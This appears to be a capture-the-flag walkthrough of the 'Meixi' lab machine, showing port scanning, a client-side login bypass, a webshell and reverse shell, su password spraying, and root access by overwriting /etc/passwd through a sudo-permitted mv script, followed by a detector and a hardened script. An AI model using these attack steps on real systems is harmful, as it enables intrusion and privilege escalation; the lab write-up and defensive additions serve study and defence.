MazeSec-Meixi-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.199 08:00:27:6c:4b:b3 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ef:12:9a VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.071 seconds (123.61 hosts/sec). 4 responded
export ip=192.168.60.199
❯ rustscan -a $ip

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.199:22
Open 192.168.60.199:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-27 10:39 CST
Initiating ARP Ping Scan at 10:39
Scanning 192.168.60.199 [1 port]
Completed ARP Ping Scan at 10:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:39
Completed Parallel DNS resolution of 1 host. at 10:39, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:39
Scanning 192.168.60.199 [2 ports]
Discovered open port 80/tcp on 192.168.60.199
Discovered open port 22/tcp on 192.168.60.199
Completed SYN Stealth Scan at 10:39, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.199
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-05-27 10:39:28 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:6C:4B:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.199
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 1556]
/index.html (Status: 200) [Size: 4585]
/pass (Status: 200) [Size: 39]
/5000.txt (Status: 200) [Size: 39685]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

A login form is found.

Testing shows that the check is purely client-side.

Whatever username and password you enter, removing the disabled attribute from the form lets you log in.

After logging in there is an "Activate Webshell" option.

But it reports that you have no permission; it is probably just there to confuse you 😅

There is also a /pass path; curl it.

❯ curl http://192.168.60.199/pass
NR==1000||NR==2000||NR==3000||NR==4000

This is an awk condition expression: it is true when the record (line) number NR equals 1000, 2000, 3000 or 4000, so it selects exactly those four lines of whatever file it is run against.

❯ curl http://192.168.60.199/5000.txt -o 5000.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 39685 100 39685 0 0 13.0M 0 --:--:-- --:--:-- --:--:-- 18.9M
wc -l 5000.txt
5000 5000.txt

Follow the hint and look up the passwords.

❯ awk 'NR==1000 || NR==2000 || NR==3000 || NR==4000 {print $0}' 5000.txt
cassandra
fuckit
pinkgirl
summertime

So what is the username? Surely it does not need brute-forcing.

It turns out that logging in with root as the username activates the webshell 😅

User Escalation

Start a listener and catch the reverse shell.

There are several users: laoye, sublarge, qiaojojo and hyh.

And qiaojojo also has the GECOS comment "catch me".

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Meixi-192.168.60.199-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Meixi~192.168.60.199_Linux_x86_64/2025_05_27-19_10_26-033.log 📜
────────────────────────────────────────────────────────────────────────────────────
www-data@Meixi:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
laoye:x:1000:1000:,,,:/home/laoye:/bin/bash
sublarge:x:1001:1001::/home/sublarge:/bin/bash
qiaojojo:x:1002:1002:catch me:/home/qiaojojo:/bin/bash
hyh:x:1003:1003:,,,:/home/hyh:/bin/bash

Try the passwords obtained above against each user in turn.

This yields the credentials qiaojojo:pinkgirl.

www-data@Meixi:/tmp$ ./suForce -u qiaojojo -w pass.txt
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | qiaojojo
📖 Wordlist | pass.txt
🔎 Status | 3/4/75%/pinkgirl
💥 Password | pinkgirl
───────────────────────────────────

www-data@Meixi:/tmp$ su qiaojojo
Password:
qiaojojo@Meixi:/tmp$
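From the defender's side, a wordlist run through su like the suForce session above leaves a burst of failed-authentication lines in auth.log. The following is an added example, not part of the walkthrough: a small awk-based detector run over constructed sample lines in the format util-linux su writes to syslog (the threshold of three failures is an assumption).

```shell
#!/bin/bash
# Detection for su-based password spraying (added example, not part of the walkthrough).
# Constructed sample lines in util-linux su's syslog format: "FAILED SU (to TARGET) SOURCE on TTY"
# for each bad password and "(to TARGET) SOURCE on TTY" on success. The tag may also appear
# as "su[PID]:" depending on the syslog setup; the pattern below accepts both.
SAMPLE_AUTH_LOG=$(cat <<'EOF'
May 27 07:40:01 Meixi su: FAILED SU (to qiaojojo) www-data on pts/0
May 27 07:40:02 Meixi su: FAILED SU (to qiaojojo) www-data on pts/0
May 27 07:40:02 Meixi su: FAILED SU (to qiaojojo) www-data on pts/0
May 27 07:40:03 Meixi su: (to qiaojojo) www-data on pts/0
May 27 07:41:10 Meixi su: FAILED SU (to root) laoye on pts/1
May 27 07:41:30 Meixi su: (to root) laoye on pts/1
May 27 07:42:00 Meixi sshd[812]: Accepted publickey for laoye from 192.168.60.100 port 50412 ssh2
EOF
)

# Read auth.log lines on stdin and print one ALERT per "source -> target" pair that reached
# THRESHOLD failed su attempts, noting whether a later su to that target succeeded (the spray
# landed). A wordlist fed to su from a service account such as www-data produces exactly this
# burst within a few seconds.
su_spray_alerts() {
    local threshold="${1:-3}"   # assumption: three failures from one source is already suspicious
    awk -v thr="$threshold" '
        / su(\[[0-9]+\])?: FAILED SU \(to / {
            tgt = $9; sub(/\)$/, "", tgt); src = $10
            fail[src " -> " tgt]++
            next
        }
        / su(\[[0-9]+\])?: \(to / {
            tgt = $7; sub(/\)$/, "", tgt); src = $8
            ok[src " -> " tgt] = 1
        }
        END {
            for (k in fail) {
                if (fail[k] < thr) continue
                landed = (k in ok) ? "yes" : "no"
                printf "ALERT %s failures=%d landed=%s\n", k, fail[k], landed
            }
        }'
}

printf '%s\n' "$SAMPLE_AUTH_LOG" | su_spray_alerts 3
```

On the sample above only the www-data -> qiaojojo pair reaches the threshold, and it is reported as a spray that landed; the single laoye failure stays below it.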

The user has sudo rights.

They can run /opt/move.sh.

Looking at the script, it simply wraps mv to move a file.

qiaojojo@Meixi:~$ cat user.txt
flag{user-0af862be-3a27-11f0-9396-000c2955ba04}
qiaojojo@Meixi:~$ sudo -l
Matching Defaults entries for qiaojojo on Meixi:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiaojojo may run the following commands on Meixi:
(ALL) NOPASSWD: /opt/move.sh
qiaojojo@Meixi:~$ cd /opt/
qiaojojo@Meixi:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 May 26 07:54 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
-rwxr-xr-x 1 root root 402 May 26 07:54 move.sh
qiaojojo@Meixi:/opt$ cat move.sh
#!/bin/bash

if [ $# -ne 2 ]; then
    echo "Error: Incorrect number of arguments" >&2
    exit 1
fi

src_file=$1
dest_path=$2

if [ ! -f "$src_file" ]; then
    echo "Error: Source file does not exist" >&2
    exit 2
fi

mv "$src_file" "$dest_path"

if [ $? -eq 0 ]; then
    echo "File moved successfully: $src_file -> $dest_path"
else
    echo "Unknown error: Failed to move file" >&2
    exit 4
fi

Ah, this is the original challenge from the first version of the earlier Laoda box:

Temp-Laoda-Walkthrough | Pepster’Blog

qiaojojo@Meixi:/opt$ cd /tmp/
qiaojojo@Meixi:/tmp$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/qiaojojo/.ssh/id_rsa): /tmp/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/id_rsa
Your public key has been saved in /tmp/id_rsa.pub
The key fingerprint is:
SHA256:9jEUfDXm7RjeVuECUc2zXeSkFQ1CpW6haXFitWm5JWo qiaojojo@Meixi

Strange, why can't it be reproduced this time? I expected mv to take the "copy + delete" path.

But this time mv keeps the original file's owner and group when it moves the file. The likely reason is that, running as root with source and destination on the same filesystem, mv first tries the most efficient, atomic operation, a rename(2) of the existing inode, which leaves the owner and group untouched; only a cross-filesystem move falls back to copy + delete and creates a new file owned by the caller.

qiaojojo@Meixi:/tmp$ cp /etc/passwd .
qiaojojo@Meixi:/tmp$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
qiaojojo@Meixi:/tmp$ sudo /opt/move.sh passwd /etc/passwd
File moved successfully: passwd -> /etc/passwd
qiaojojo@Meixi:/tmp$ ls -al /etc/passwd
-rw-r--r-- 1 qiaojojo qiaojojo 1575 May 27 07:45 /etc/passwd
qiaojojo@Meixi:/tmp$ su primary
Password:
root@Meixi:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Meixi:/tmp# cat /root/root.txt
flag{root-137dd239-3a2a-11f0-a3e5-000c2955ba04}
root@Meixi:/tmp# cat /home/qiaojojo/user.txt
flag{user-0af862be-3a27-11f0-9396-000c2955ba04}
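The root cause is a sudo rule that lets an unprivileged user choose both arguments of an mv run as root, so any file, /etc/passwd included, can be replaced by one the user wrote. The following hardened variant is an added example, not the box's /opt/move.sh: it assumes the helper only ever needs to deposit files into one directory, ALLOWED_DIR (hypothetical), refuses destinations outside it and existing targets, and hands the file to root after the rename so the caller's ownership does not survive.

```shell
#!/bin/bash
# Hardened replacement for the move helper above (added example, not the box's script).
# Assumptions: files only ever need to land directly inside ALLOWED_DIR (hypothetical), and
# both arguments are attacker-controlled because the helper is invoked through sudo.
ALLOWED_DIR="${ALLOWED_DIR:-/srv/incoming}"

safe_move() {
    local src="$1" dest="$2" real_dir real_parent real_dest
    [ "$#" -eq 2 ] || { echo "usage: safe_move SRC DEST" >&2; return 1; }

    # Source must be a regular file, not a symlink pointing at something sensitive.
    if [ ! -f "$src" ] || [ -L "$src" ]; then
        echo "Error: source is not a regular file" >&2; return 2
    fi

    # Canonicalise the allowed directory and the destination's parent directory so that
    # "..", symlinked directories and relative paths cannot escape the drop directory.
    real_dir=$(realpath "$ALLOWED_DIR") || return 3
    real_parent=$(realpath "$(dirname -- "$dest")") || return 3
    if [ "$real_parent" != "$real_dir" ]; then
        echo "Error: destination must be directly inside $real_dir" >&2; return 4
    fi
    real_dest="$real_parent/$(basename -- "$dest")"

    # Never replace an existing path: overwriting /etc/passwd is exactly what the
    # original script allows.
    if [ -e "$real_dest" ] || [ -L "$real_dest" ]; then
        echo "Error: destination already exists" >&2; return 5
    fi

    mv -- "$src" "$real_dest" || { echo "Error: move failed" >&2; return 6; }

    # A same-filesystem mv is a rename(2): the inode, and with it the caller's ownership,
    # survives the move. When running privileged, hand the file to root so the caller
    # cannot keep editing it afterwards.
    if [ "$(id -u)" -eq 0 ]; then
        chown root:root -- "$real_dest" || return 7
    fi
    echo "File moved successfully: $src -> $real_dest"
}
```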